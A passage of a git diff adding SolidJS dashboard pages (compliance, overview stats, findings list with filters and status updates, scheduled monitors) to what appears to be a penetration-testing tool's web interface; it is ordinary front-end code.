+                                  <div class="flex items-center justify-between">
+                                    <div class="flex-1">
+                                      <div class="text-sm font-medium text-gray-200">
+                                        {control.id} - {control.name}
+                                      </div>
+                                      <div class="text-xs text-gray-500 mt-1">
+                                        {control.description}
+                                      </div>
+                                    </div>
+                                    <Show when={controlAssessment}>
+                                      <div class="ml-4 flex items-center gap-2">
+                                        <StatusBadge status={controlAssessment!.status} />
+                                        <Show when={controlAssessment!.findings.length > 0}>
+                                          <span class="text-xs text-gray-400">
+                                            ({controlAssessment!.findings.length} findings)
+                                          </span>
+                                        </Show>
+                                      </div>
+                                    </Show>
+                                  </div>
+                                  <Show when={controlAssessment?.notes}>
+                                    <div class="mt-2 text-xs text-gray-400 bg-gray-900 p-2 rounded">
+                                      {controlAssessment!.notes}
+                                    </div>
+                                  </Show>
+                                </div>
+                              )
+                            }}
+                          </For>
+                        </div>
+                      </Show>
+                    </button>
+                  )
+                }}
+              </For>
+            </div>
+
+            {/* Assessment timestamp */}
+            <div class="text-xs text-gray-500 mt-4 text-right">
+              Assessment run: {new Date(assessment()!.timestamp).toLocaleString()}
+            </div>
+          </Show>
+
+          <Show when={!assessment() && !assessing()}>
+            <div class="text-center py-12 text-gray-400">
+              <svg class="w-16 h-16 mx-auto mb-4 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z" />
+              </svg>
+              <p>Run an assessment to see how your findings map to {selectedFramework()!.name} controls.</p>
+              <p class="text-sm text-gray-500 mt-2">
+                The assessment will automatically map your security findings to compliance controls.
+              </p>
+            </div>
+          </Show>
+        </div>
+      </Show>
+
+      <Show when={!selectedFramework() && !loading()}>
+        <div class="text-center py-12 text-gray-400">
+          <svg class="w-16 h-16 mx-auto mb-4 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z" />
+          </svg>
+          <p>Select a compliance framework to begin.</p>
+        </div>
+      </Show>
+    </div>
+  )
+}
+
+export default Compliance
diff --git a/packages/opencode/src/dashboard/src/pages/Dashboard.tsx b/packages/opencode/src/dashboard/src/pages/Dashboard.tsx
new file mode 100644
index 00000000000..ee16b7368d5
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/pages/Dashboard.tsx
@@ -0,0 +1,244 @@
+import { Component, createSignal, createEffect, onCleanup, Show } from "solid-js"
+import { A } from "@solidjs/router"
+import { statsApi, type OverviewStats, type TrendData } from "../api/client"
+import { SeverityPie } from "../components/charts/SeverityPie"
+import { TrendLine } from "../components/charts/TrendLine"
+import { StatusBar } from "../components/charts/StatusBar"
+import { sseClient } from "../api/sse"
+
+const Dashboard: Component = () => {
+  const [stats, setStats] = createSignal<OverviewStats | null>(null)
+  const [trends, setTrends] = createSignal<TrendData[]>([])
+  const [loading, setLoading] = createSignal(true)
+  const [error, setError] = createSignal<string | null>(null)
+
+  const fetchData = async () => {
+    setLoading(true)
+    setError(null)
+
+    const [statsResult, trendsResult] = await Promise.all([
+      statsApi.overview(),
+      statsApi.trends(30),
+    ])
+
+    if (statsResult.error) {
+      setError(statsResult.error)
+    } else if (statsResult.data) {
+      setStats(statsResult.data)
+    }
+
+    if (trendsResult.data) {
+      setTrends(trendsResult.data.trends)
+    }
+
+    setLoading(false)
+  }
+
+  createEffect(() => {
+    fetchData()
+  })
+
+  // Refresh on new findings
+  onCleanup(
+    sseClient.on("pentest.finding_created", () => {
+      fetchData()
+    })
+  )
+
+  const formatDuration = (ms: number) => {
+    if (ms === 0) return "N/A"
+    const hours = Math.floor(ms / (1000 * 60 * 60))
+    const days = Math.floor(hours / 24)
+    if (days > 0) return `${days}d`
+    if (hours > 0) return `${hours}h`
+    const minutes = Math.floor(ms / (1000 * 60))
+    return `${minutes}m`
+  }
+
+  return (
+    <div class="space-y-6">
+      {/* Page header */}
+      <div class="flex items-center justify-between">
+        <div>
+          <h1 class="text-2xl font-bold text-gray-100">Security Dashboard</h1>
+          <p class="text-gray-400 mt-1">Overview of your security posture</p>
+        </div>
+        <button
+          onClick={fetchData}
+          class="btn btn-secondary flex items-center gap-2"
+          disabled={loading()}
+        >
+          <svg class={`w-4 h-4 ${loading() ? "animate-spin" : ""}`} fill="none" stroke="currentColor" viewBox="0 0 24 24">
+            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 4v5h.582m15.356 2A8.001 8.001 0 004.582 9m0 0H9m11 11v-5h-.581m0 0a8.003 8.003 0 01-15.357-2m15.357 2H15" />
+          </svg>
+          Refresh
+        </button>
+      </div>
+
+      <Show when={error()}>
+        <div class="bg-red-900/50 border border-red-700 rounded-lg p-4 text-red-200">
+          {error()}
+        </div>
+      </Show>
+
+      <Show when={loading() && !stats()}>
+        <div class="flex items-center justify-center h-64">
+          <div class="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-500"></div>
+        </div>
+      </Show>
+
+      <Show when={stats()}>
+        {/* Stats cards */}
+        <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-4">
+          <div class="stat-card">
+            <div class="flex items-center justify-between">
+              <div>
+                <div class="stat-value">{stats()!.findings.total}</div>
+                <div class="stat-label">Total Findings</div>
+              </div>
+              <div class="w-12 h-12 bg-blue-900/50 rounded-lg flex items-center justify-center">
+                <svg class="w-6 h-6 text-blue-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" />
+                </svg>
+              </div>
+            </div>
+          </div>
+
+          <div class="stat-card">
+            <div class="flex items-center justify-between">
+              <div>
+                <div class={`stat-value ${stats()!.findings.openCriticalHigh > 0 ? "text-red-400" : "text-green-400"}`}>
+                  {stats()!.findings.openCriticalHigh}
+                </div>
+                <div class="stat-label">Critical/High Open</div>
+              </div>
+              <div class={`w-12 h-12 ${stats()!.findings.openCriticalHigh > 0 ? "bg-red-900/50" : "bg-green-900/50"} rounded-lg flex items-center justify-center`}>
+                <svg class={`w-6 h-6 ${stats()!.findings.openCriticalHigh > 0 ? "text-red-400" : "text-green-400"}`} fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 8v4m0 4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
+                </svg>
+              </div>
+            </div>
+          </div>
+
+          <div class="stat-card">
+            <div class="flex items-center justify-between">
+              <div>
+                <div class="stat-value">{stats()!.scans.last24h}</div>
+                <div class="stat-label">Scans (24h)</div>
+              </div>
+              <div class="w-12 h-12 bg-purple-900/50 rounded-lg flex items-center justify-center">
+                <svg class="w-6 h-6 text-purple-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2" />
+                </svg>
+              </div>
+            </div>
+          </div>
+
+          <div class="stat-card">
+            <div class="flex items-center justify-between">
+              <div>
+                <div class="stat-value text-green-400">{stats()!.remediation.mitigatedLast7d}</div>
+                <div class="stat-label">Mitigated (7d)</div>
+              </div>
+              <div class="w-12 h-12 bg-green-900/50 rounded-lg flex items-center justify-center">
+                <svg class="w-6 h-6 text-green-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m6 2a9 9 0 11-18 0 9 9 0 0118 0z" />
+                </svg>
+              </div>
+            </div>
+          </div>
+        </div>
+
+        {/* Charts row */}
+        <div class="grid grid-cols-1 lg:grid-cols-2 gap-6">
+          {/* Severity distribution */}
+          <div class="card">
+            <div class="card-header flex items-center justify-between">
+              <span>Severity Distribution</span>
+              <A href="/findings" class="text-sm text-blue-400 hover:text-blue-300">View all</A>
+            </div>
+            <SeverityPie data={stats()!.findings.bySeverity} size={180} />
+          </div>
+
+          {/* Status distribution */}
+          <div class="card">
+            <div class="card-header flex items-center justify-between">
+              <span>Finding Status</span>
+              <A href="/findings" class="text-sm text-blue-400 hover:text-blue-300">View all</A>
+            </div>
+            <div class="space-y-4">
+              <StatusBar data={stats()!.findings.byStatus} height={32} />
+              <div class="grid grid-cols-2 gap-4 mt-6">
+                <div class="text-center p-4 bg-gray-750 rounded-lg">
+                  <div class="text-2xl font-bold text-gray-100">
+                    {stats()!.scans.activeMonitors}
+                  </div>
+                  <div class="text-sm text-gray-400">Active Monitors</div>
+                </div>
+                <div class="text-center p-4 bg-gray-750 rounded-lg">
+                  <div class="text-2xl font-bold text-gray-100">
+                    {formatDuration(stats()!.remediation.avgTimeToMitigate)}
+                  </div>
+                  <div class="text-sm text-gray-400">Avg. Time to Fix</div>
+                </div>
+              </div>
+            </div>
+          </div>
+        </div>
+
+        {/* Trend chart */}
+        <div class="card">
+          <div class="card-header">Finding Trends (30 days)</div>
+          <TrendLine data={trends()} height={250} />
+        </div>
+
+        {/* Quick actions */}
+        <div class="grid grid-cols-1 md:grid-cols-3 gap-4">
+          <A href="/findings?status=open" class="card hover:border-blue-500 transition-colors group">
+            <div class="flex items-center gap-4">
+              <div class="w-12 h-12 bg-red-900/50 rounded-lg flex items-center justify-center">
+                <svg class="w-6 h-6 text-red-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 8v4m0 4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
+                </svg>
+              </div>
+              <div>
+                <div class="font-medium text-gray-100 group-hover:text-blue-400">Open Findings</div>
+                <div class="text-sm text-gray-400">{stats()!.findings.byStatus.open || 0} issues need attention</div>
+              </div>
+            </div>
+          </A>
+
+          <A href="/compliance" class="card hover:border-blue-500 transition-colors group">
+            <div class="flex items-center gap-4">
+              <div class="w-12 h-12 bg-blue-900/50 rounded-lg flex items-center justify-center">
+                <svg class="w-6 h-6 text-blue-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z" />
+                </svg>
+              </div>
+              <div>
+                <div class="font-medium text-gray-100 group-hover:text-blue-400">Compliance</div>
+                <div class="text-sm text-gray-400">Run PCI-DSS, HIPAA, SOC2 assessments</div>
+              </div>
+            </div>
+          </A>
+
+          <A href="/reports" class="card hover:border-blue-500 transition-colors group">
+            <div class="flex items-center gap-4">
+              <div class="w-12 h-12 bg-green-900/50 rounded-lg flex items-center justify-center">
+                <svg class="w-6 h-6 text-green-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 17v-2m3 2v-4m3 4v-6m2 10H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z" />
+                </svg>
+              </div>
+              <div>
+                <div class="font-medium text-gray-100 group-hover:text-blue-400">Generate Report</div>
+                <div class="text-sm text-gray-400">Executive or technical reports</div>
+              </div>
+            </div>
+          </A>
+        </div>
+      </Show>
+    </div>
+  )
+}
+
+export default Dashboard
diff --git a/packages/opencode/src/dashboard/src/pages/Findings.tsx b/packages/opencode/src/dashboard/src/pages/Findings.tsx
new file mode 100644
index 00000000000..f982aaa0acc
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/pages/Findings.tsx
@@ -0,0 +1,374 @@
+import { Component, createSignal, createEffect, Show, For, onCleanup } from "solid-js"
+import { useParams, useSearchParams, A } from "@solidjs/router"
+import { findingsApi, type Finding, type FindingFilters } from "../api/client"
+import { SeverityBadge } from "../components/shared/SeverityBadge"
+import { StatusBadge } from "../components/shared/StatusBadge"
+import { DataTable, type Column } from "../components/shared/DataTable"
+import { sseClient } from "../api/sse"
+
+const Findings: Component = () => {
+  const params = useParams()
+  const [searchParams, setSearchParams] = useSearchParams()
+
+  const [findings, setFindings] = createSignal<Finding[]>([])
+  const [selectedFinding, setSelectedFinding] = createSignal<Finding | null>(null)
+  const [loading, setLoading] = createSignal(true)
+  const [error, setError] = createSignal<string | null>(null)
+
+  // Filter state
+  const [severityFilter, setSeverityFilter] = createSignal(searchParams.severity || "")
+  const [statusFilter, setStatusFilter] = createSignal(searchParams.status || "")
+  const [targetFilter, setTargetFilter] = createSignal(searchParams.target || "")
+
+  const fetchFindings = async () => {
+    setLoading(true)
+    setError(null)
+
+    const filters: FindingFilters = {}
+    if (severityFilter()) filters.severity = severityFilter()
+    if (statusFilter()) filters.status = statusFilter()
+    if (targetFilter()) filters.target = targetFilter()
+
+    const result = await findingsApi.list(filters)
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setFindings(result.data.findings)
+    }
+
+    setLoading(false)
+  }
+
+  const fetchFindingDetail = async (id: string) => {
+    const result = await findingsApi.get(id)
+    if (result.data) {
+      setSelectedFinding(result.data.finding)
+    }
+  }
+
+  createEffect(() => {
+    if (params.id) {
+      fetchFindingDetail(params.id)
+    } else {
+      setSelectedFinding(null)
+    }
+  })
+
+  createEffect(() => {
+    fetchFindings()
+  })
+
+  // Real-time updates
+  onCleanup(
+    sseClient.on("pentest.finding_created", (event) => {
+      const finding = event.properties.finding as Finding
+      if (finding) {
+        setFindings((prev) => [finding, ...prev])
+      }
+    })
+  )
+
+  onCleanup(
+    sseClient.on("pentest.finding_updated", (event) => {
+      const finding = event.properties.finding as Finding
+      if (finding) {
+        setFindings((prev) => prev.map((f) => (f.id === finding.id ? finding : f)))
+        if (selectedFinding()?.id === finding.id) {
+          setSelectedFinding(finding)
+        }
+      }
+    })
+  )
+
+  const updateStatus = async (id: string, status: Finding["status"]) => {
+    const result = await findingsApi.update(id, { status })
+    if (result.data) {
+      setFindings((prev) => prev.map((f) => (f.id === id ? result.data!.finding : f)))
+      if (selectedFinding()?.id === id) {
+        setSelectedFinding(result.data.finding)
+      }
+    }
+  }
+
+  const deleteFinding = async (id: string) => {
+    if (!confirm("Are you sure you want to delete this finding?")) return
+
+    const result = await findingsApi.delete(id)
+    if (result.data?.success) {
+      setFindings((prev) => prev.filter((f) => f.id !== id))
+      if (selectedFinding()?.id === id) {
+        setSelectedFinding(null)
+      }
+    }
+  }
+
+  const applyFilters = () => {
+    const params: Record<string, string> = {}
+    if (severityFilter()) params.severity = severityFilter()
+    if (statusFilter()) params.status = statusFilter()
+    if (targetFilter()) params.target = targetFilter()
+    setSearchParams(params)
+    fetchFindings()
+  }
+
+  const clearFilters = () => {
+    setSeverityFilter("")
+    setStatusFilter("")
+    setTargetFilter("")
+    setSearchParams({})
+    fetchFindings()
+  }
+
+  const columns: Column<Finding>[] = [
+    {
+      key: "severity",
+      header: "Severity",
+      width: "100px",
+      render: (f) => <SeverityBadge severity={f.severity} />,
+    },
+    {
+      key: "title",
+      header: "Title",
+      render: (f) => (
+        <div>
+          <div class="font-medium text-gray-100">{f.title}</div>
+          <div class="text-xs text-gray-500 mt-1">{f.target}{f.port ? `:${f.port}` : ""}</div>
+        </div>
+      ),
+    },
+    {
+      key: "status",
+      header: "Status",
+      width: "120px",
+      render: (f) => <StatusBadge status={f.status} />,
+    },
+    {
+      key: "service",
+      header: "Service",
+      width: "100px",
+      render: (f) => <span class="text-gray-400">{f.service || "-"}</span>,
+    },
+    {
+      key: "createdAt",
+      header: "Created",
+      width: "120px",
+      render: (f) => (
+        <span class="text-gray-400 text-sm">
+          {new Date(f.createdAt).toLocaleDateString()}
+        </span>
+      ),
+    },
+  ]
+
+  return (
+    <div class="space-y-6">
+      {/* Header */}
+      <div class="flex items-center justify-between">
+        <div>
+          <h1 class="text-2xl font-bold text-gray-100">Findings</h1>
+          <p class="text-gray-400 mt-1">Security findings from scans and assessments</p>
+        </div>
+        <div class="flex items-center gap-2">
+          <span class="text-sm text-gray-400">{findings().length} findings</span>
+        </div>
+      </div>
+
+      {/* Filters */}
+      <div class="card">
+        <div class="flex flex-wrap items-end gap-4">
+          <div>
+            <label class="block text-sm text-gray-400 mb-1">Severity</label>
+            <select
+              class="select"
+              value={severityFilter()}
+              onChange={(e) => setSeverityFilter(e.currentTarget.value)}
+            >
+              <option value="">All</option>
+              <option value="critical">Critical</option>
+              <option value="high">High</option>
+              <option value="medium">Medium</option>
+              <option value="low">Low</option>
+              <option value="info">Info</option>
+            </select>
+          </div>
+
+          <div>
+            <label class="block text-sm text-gray-400 mb-1">Status</label>
+            <select
+              class="select"
+              value={statusFilter()}
+              onChange={(e) => setStatusFilter(e.currentTarget.value)}
+            >
+              <option value="">All</option>
+              <option value="open">Open</option>
+              <option value="confirmed">Confirmed</option>
+              <option value="mitigated">Mitigated</option>
+              <option value="false_positive">False Positive</option>
+            </select>
+          </div>
+
+          <div>
+            <label class="block text-sm text-gray-400 mb-1">Target</label>
+            <input
+              type="text"
+              class="input"
+              placeholder="Filter by target..."
+              value={targetFilter()}
+              onInput={(e) => setTargetFilter(e.currentTarget.value)}
+            />
+          </div>
+
+          <div class="flex gap-2">
+            <button onClick={applyFilters} class="btn btn-primary">Apply</button>
+            <button onClick={clearFilters} class="btn btn-secondary">Clear</button>
+          </div>
+        </div>
+      </div>
+
+      <Show when={error()}>
+        <div class="bg-red-900/50 border border-red-700 rounded-lg p-4 text-red-200">
+          {error()}
+        </div>
+      </Show>
+
+      {/* Main content */}
+      <div class="flex gap-6">
+        {/* Findings list */}
+        <div class={`card flex-1 ${selectedFinding() ? "max-w-2xl" : ""}`}>
+          <DataTable
+            columns={columns}
+            data={findings()}
+            loading={loading()}
+            emptyMessage="No findings found"
+            onRowClick={(f) => setSelectedFinding(f)}
+          />
+        </div>
+
+        {/* Detail panel */}
+        <Show when={selectedFinding()}>
+          <div class="card w-96 flex-shrink-0">
+            <div class="flex items-center justify-between mb-4">
+              <h3 class="text-lg font-semibold text-gray-100">Finding Details</h3>
+              <button
+                onClick={() => setSelectedFinding(null)}
+                class="text-gray-400 hover:text-gray-100"
+              >
+                <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M6 18L18 6M6 6l12 12" />
+                </svg>
+              </button>
+            </div>
+
+            <div class="space-y-4">
+              <div>
+                <div class="text-sm text-gray-400">Title</div>
+                <div class="text-gray-100 font-medium">{selectedFinding()!.title}</div>
+              </div>
+
+              <div class="flex gap-4">
+                <div>
+                  <div class="text-sm text-gray-400">Severity</div>
+                  <SeverityBadge severity={selectedFinding()!.severity} />
+                </div>
+                <div>
+                  <div class="text-sm text-gray-400">Status</div>
+                  <StatusBadge status={selectedFinding()!.status} />
+                </div>
+              </div>
+
+              <div>
+                <div class="text-sm text-gray-400">Target</div>
+                <div class="text-gray-100">
+                  {selectedFinding()!.target}
+                  {selectedFinding()!.port && `:${selectedFinding()!.port}`}
+                  {selectedFinding()!.service && ` (${selectedFinding()!.service})`}
+                </div>
+              </div>
+
+              <div>
+                <div class="text-sm text-gray-400">Description</div>
+                <div class="text-gray-300 text-sm">{selectedFinding()!.description}</div>
+              </div>
+
+              <Show when={selectedFinding()!.evidence}>
+                <div>
+                  <div class="text-sm text-gray-400">Evidence</div>
+                  <div class="text-gray-300 text-sm bg-gray-900 p-2 rounded font-mono">
+                    {selectedFinding()!.evidence}
+                  </div>
+                </div>
+              </Show>
+
+              <Show when={selectedFinding()!.remediation}>
+                <div>
+                  <div class="text-sm text-gray-400">Remediation</div>
+                  <div class="text-gray-300 text-sm">{selectedFinding()!.remediation}</div>
+                </div>
+              </Show>
+
+              <Show when={selectedFinding()!.cve?.length}>
+                <div>
+                  <div class="text-sm text-gray-400">CVEs</div>
+                  <div class="flex flex-wrap gap-1">
+                    <For each={selectedFinding()!.cve}>
+                      {(cve) => (
+                        <span class="badge bg-gray-700 text-gray-300">{cve}</span>
+                      )}
+                    </For>
+                  </div>
+                </div>
+              </Show>
+
+              {/* Status actions */}
+              <div class="pt-4 border-t border-gray-700">
+                <div class="text-sm text-gray-400 mb-2">Update Status</div>
+                <div class="flex flex-wrap gap-2">
+                  <Show when={selectedFinding()!.status !== "confirmed"}>
+                    <button
+                      onClick={() => updateStatus(selectedFinding()!.id, "confirmed")}
+                      class="btn btn-secondary text-sm"
+                    >
+                      Confirm
+                    </button>
+                  </Show>
+                  <Show when={selectedFinding()!.status !== "mitigated"}>
+                    <button
+                      onClick={() => updateStatus(selectedFinding()!.id, "mitigated")}
+                      class="btn btn-success text-sm"
+                    >
+                      Mitigated
+                    </button>
+                  </Show>
+                  <Show when={selectedFinding()!.status !== "false_positive"}>
+                    <button
+                      onClick={() => updateStatus(selectedFinding()!.id, "false_positive")}
+                      class="btn btn-secondary text-sm"
+                    >
+                      False Positive
+                    </button>
+                  </Show>
+                  <button
+                    onClick={() => deleteFinding(selectedFinding()!.id)}
+                    class="btn btn-danger text-sm"
+                  >
+                    Delete
+                  </button>
+                </div>
+              </div>
+
+              <div class="text-xs text-gray-500 pt-2">
+                Created: {new Date(selectedFinding()!.createdAt).toLocaleString()}
+                {selectedFinding()!.updatedAt && (
+                  <> | Updated: {new Date(selectedFinding()!.updatedAt).toLocaleString()}</>
+                )}
+              </div>
+            </div>
+          </div>
+        </Show>
+      </div>
+    </div>
+  )
+}
+
+export default Findings
diff --git a/packages/opencode/src/dashboard/src/pages/Monitors.tsx b/packages/opencode/src/dashboard/src/pages/Monitors.tsx
new file mode 100644
index 00000000000..85679949838
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/pages/Monitors.tsx
@@ -0,0 +1,429 @@
+import { Component, createSignal, createEffect, Show, For, onCleanup } from "solid-js"
+import { useParams } from "@solidjs/router"
+import { monitorsApi, type Monitor, type MonitorRun } from "../api/client"
+import { StatusBadge } from "../components/shared/StatusBadge"
+import { DataTable, type Column } from "../components/shared/DataTable"
+import { sseClient } from "../api/sse"
+
+const Monitors: Component = () => {
+  const params = useParams()
+
+  const [monitors, setMonitors] = createSignal<Monitor[]>([])
+  const [runs, setRuns] = createSignal<MonitorRun[]>([])
+  const [selectedMonitor, setSelectedMonitor] = createSignal<Monitor | null>(null)
+  const [runningMonitors, setRunningMonitors] = createSignal<string[]>([])
+  const [loading, setLoading] = createSignal(true)
+  const [triggering, setTriggering] = createSignal<string | null>(null)
+  const [error, setError] = createSignal<string | null>(null)
+
+  const fetchMonitors = async () => {
+    setLoading(true)
+    setError(null)
+
+    const result = await monitorsApi.list()
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setMonitors(result.data.monitors)
+    }
+
+    setLoading(false)
+  }
+
+  const fetchMonitorDetail = async (id: string) => {
+    const result = await monitorsApi.get(id)
+    if (result.data) {
+      setSelectedMonitor(result.data.monitor)
+      fetchRuns(id)
+    }
+  }
+
+  const fetchRuns = async (monitorId: string) => {
+    const result = await monitorsApi.listRuns(monitorId, 10)
+    if (result.data) {
+      setRuns(result.data.runs)
+    }
+  }
+
+  const triggerRun = async (monitorId: string) => {
+    setTriggering(monitorId)
+    const result = await monitorsApi.triggerRun(monitorId)
+    setTriggering(null)
+
+    if (result.error) {
+      setError(result.error)
+    } else {
+      setRunningMonitors((prev) => [...prev, monitorId])
+    }
+  }
+
+  createEffect(() => {
+    if (params.id) {
+      fetchMonitorDetail(params.id)
+    } else {
+      setSelectedMonitor(null)
+      setRuns([])
+    }
+  })
+
+  createEffect(() => {
+    fetchMonitors()
+  })
+
+  // Real-time updates
+  onCleanup(
+    sseClient.on("pentest.monitor.run_started", (event) => {
+      const monitorID = event.properties.monitorID as string
+      if (monitorID) {
+        setRunningMonitors((prev) => [...prev, monitorID])
+      }
+    })
+  )
+
+  onCleanup(
+    sseClient.on("pentest.monitor.run_completed", (event) => {
+      const monitorID = event.properties.monitorID as string
+      if (monitorID) {
+        setRunningMonitors((prev) => prev.filter((id) => id !== monitorID))
+        fetchMonitors()
+        if (selectedMonitor()?.id === monitorID) {
+          fetchRuns(monitorID)
+        }
+      }
+    })
+  )
+
+  onCleanup(
+    sseClient.on("pentest.monitor.run_failed", (event) => {
+      const monitorID = event.properties.monitorID as string
+      if (monitorID) {
+        setRunningMonitors((prev) => prev.filter((id) => id !== monitorID))
+        fetchMonitors()
+      }
+    })
+  )
+
+  const formatSchedule = (monitor: Monitor) => {
+    if (monitor.schedule.type === "interval") {
+      const hours = Math.floor((monitor.schedule.interval || 0) / (60 * 60 * 1000))
+      if (hours >= 24) return `Every ${Math.floor(hours / 24)} day(s)`
+      return `Every ${hours} hour(s)`
+    }
+    return monitor.schedule.cron || "Custom"
+  }
+
+  const formatRelativeTime = (timestamp: number) => {
+    const now = Date.now()
+    const diff = now - timestamp
+    const minutes = Math.floor(diff / (60 * 1000))
+    const hours = Math.floor(diff / (60 * 60 * 1000))
+    const days = Math.floor(diff / (24 * 60 * 60 * 1000))
+
+    if (days > 0) return `${days}d ago`
+    if (hours > 0) return `${hours}h ago`
+    if (minutes > 0) return `${minutes}m ago`
+    return "Just now"
+  }
+
+  const columns: Column<Monitor>[] = [
+    {
+      key: "name",
+      header: "Name",
+      render: (m) => (
+        <div>
+          <div class="font-medium text-gray-100">{m.name}</div>
+          <div class="text-xs text-gray-500 mt-1">{m.targets.join(", ")}</div>
+        </div>
+      ),
+    },
+    {
+      key: "status",
+      header: "Status",
+      width: "100px",
+      render: (m) => (
+        <div class="flex items-center gap-2">
+          <StatusBadge status={m.status} />
+          <Show when={runningMonitors().includes(m.id)}>
+            <div class="w-2 h-2 bg-blue-500 rounded-full animate-pulse" title="Running" />
+          </Show>
+        </div>
+      ),
+    },
+    {
+      key: "schedule",
+      header: "Schedule",
+      width: "120px",
+      render: (m) => <span class="text-gray-400">{formatSchedule(m)}</span>,
+    },
+    {
+      key: "runCount",
+      header: "Runs",
+      width: "80px",
+      render: (m) => <span class="text-gray-300">{m.runCount}</span>,
+    },
+    {
+      key: "lastRunAt",
+      header: "Last Run",
+      width: "120px",
+      render: (m) => (
+        <span class="text-gray-400 text-sm">
+          {m.lastRunAt ? formatRelativeTime(m.lastRunAt) : "Never"}
+        </span>
+      ),
+    },
+    {
+      key: "actions",
+      header: "",
+      width: "80px",
+      render: (m) => (
+        <button
+          onClick={(e) => {
+            e.stopPropagation()
+            triggerRun(m.id)
+          }}
+          disabled={triggering() === m.id || runningMonitors().includes(m.id) || m.status !== "active"}
+          class="btn btn-secondary text-xs disabled:opacity-50"
+        >
+          {triggering() === m.id || runningMonitors().includes(m.id) ? "Running..." : "Run Now"}
+        </button>
+      ),
+    },
+  ]
+
+  const runColumns: Column<MonitorRun>[] = [
+    {
+      key: "runNumber",
+      header: "#",
+      width: "60px",
+      render: (r) => <span class="text-gray-400">#{r.runNumber}</span>,
+    },
+    {
+      key: "status",
+      header: "Status",
+      width: "100px",
+      render: (r) => <StatusBadge status={r.status} />,
+    },
+    {
+      key: "findings",
+      header: "Findings",
+      width: "100px",
+      render: (r) => (
+        <div class="text-sm">
+          <span class="text-gray-300">{r.findingIDs.length}</span>
+          <Show when={r.newFindingIDs.length > 0}>
+            <span class="text-green-400 ml-1">(+{r.newFindingIDs.length})</span>
+          </Show>
+        </div>
+      ),
+    },
+    {
+      key: "duration",
+      header: "Duration",
+      width: "100px",
+      render: (r) => {
+        if (!r.endTime) return <span class="text-gray-400">-</span>
+        const seconds = Math.floor((r.endTime - r.startTime) / 1000)
+        return <span class="text-gray-400">{seconds}s</span>
+      },
+    },
+    {
+      key: "startTime",
+      header: "Started",
+      render: (r) => (
+        <span class="text-gray-400 text-sm">
+          {new Date(r.startTime).toLocaleString()}
+        </span>
+      ),
+    },
+  ]
+
+  return (
+    <div class="space-y-6">
+      {/* Header */}
+      <div class="flex items-center justify-between">
+        <div>
+          <h1 class="text-2xl font-bold text-gray-100">Monitors</h1>
+          <p class="text-gray-400 mt-1">Scheduled security scans and assessments</p>
+        </div>
+        <div class="flex items-center gap-4">
+          <Show when={runningMonitors().length > 0}>
+            <span class="badge bg-blue-900 text-blue-200 animate-pulse">
+              {runningMonitors().length} running
+            </span>
+          </Show>
+          <span class="text-sm text-gray-400">{monitors().length} monitors</span>
+        </div>
+      </div>
+
+      <Show when={error()}>
+        <div class="bg-red-900/50 border border-red-700 rounded-lg p-4 text-red-200">
+          {error()}
+        </div>
+      </Show>
+
+      {/* Main content */}
+      <div class="flex gap-6">
+        {/* Monitors list */}
+        <div class={`card flex-1 ${selectedMonitor() ? "max-w-2xl" : ""}`}>
+          <DataTable
+            columns={columns}
+            data={monitors()}
+            loading={loading()}
+            emptyMessage="No monitors configured"
+            onRowClick={(m) => {
+              setSelectedMonitor(m)
+              fetchRuns(m.id)
+            }}
+          />
+        </div>
+
+        {/* Detail panel */}
